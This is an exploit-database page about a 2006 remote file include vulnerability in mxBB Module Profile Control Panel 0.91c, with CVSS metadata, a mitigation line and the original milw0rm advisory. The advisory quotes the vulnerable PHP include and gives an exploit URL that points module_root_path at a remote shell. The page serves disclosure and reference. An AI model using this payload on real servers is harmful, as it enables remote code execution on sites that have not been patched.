header-logo
Suggest Exploit
vendor:
mxBB Module Profile Control Panel
by:
Bugfound3R: bd0rk || SOH-Crew
8,8
CVSS
HIGH
Remote File Include
98
CWE
Product Name: mxBB Module Profile Control Panel
Affected Version From: 0.91c
Affected Version To: 0.91c
Patch Exists: YES
Related CWE: N/A
CPE: mxbb-module-profile-control-panel
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

mxBB Module Profile Control Panel 0.91c Remote File Include Vulnerability

A vulnerability in mxBB Module Profile Control Panel 0.91c allows remote attackers to include arbitrary files via a URL in the module_root_path parameter to includes/profilcp_constants.php.

Mitigation:

Upgrade to the latest version of mxBB Module Profile Control Panel 0.91c
Source

Exploit-DB raw data:

###############################################################################
##                                                                           ##
## mxBB Module Profile Control Panel 0.91c Remote File Include Vulnerability ##
##                                                                           ##
## Bugfound3R: bd0rk || SOH-Crew                                             ##
##                                                                           ##
## Website: www.soh-crew.it.tt                                               ##
##                                                                           ##
## Greetz: str0ke, Lu7k, TheJT, Natok                                        ##
##                                                                           ##
###############################################################################

Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=70

==> Vulnerable Code in profilcp_constants.php <==

Code: include_once($module_root_path . 'includes/lang_extend_mac.'.$phpEx);

Usage: http://[y0uRSiTe]/[direct0ry]/includes/profilcp_constants.php?module_root_path=http://Sh3LL?

# milw0rm.com [2006-12-09]

Navigation

Suggest Exploit

Services By CQR